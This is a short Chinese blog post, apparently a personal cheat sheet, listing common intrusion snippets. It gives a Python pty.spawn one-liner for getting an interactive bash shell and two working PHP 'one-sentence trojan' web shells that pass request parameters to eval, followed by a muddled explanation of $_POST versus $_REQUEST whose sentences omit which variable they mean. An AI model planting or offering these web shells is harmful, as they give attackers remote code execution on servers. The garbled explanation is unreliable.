作用是在Python中创建一个伪终端(pty),并在其中启动一个bash shell。这样,你可以在Python脚本中执行bash命令,就像在终端中一样。
python -c 'import pty; pty.spawn("/bin/bash")'
一句话木马:
<?php @eval($_REQUEST[ckl])?>
<?php @eval($_POST['ckl']);?>
在PHP中,$_POST是一个包含通过POST方法提交的变量的数组,而$_REQUEST是一个包含通过GET、POST和COOKIE方式提交的变量的数组。因此,只会执行通过POST方法提交的变量,而会执行通过GET、POST和COOKIE方式提交的变量。这意味着使用$_REQUEST可能会增加安全风险,因为它可以执行来自不同来源的变量。因此,最好避免使用$_REQUEST来执行代码。
标签:常用,木马,REQUEST,提权,pty,POST,bash,变量 From: https://www.cnblogs.com/chenkanglu/p/17842768.html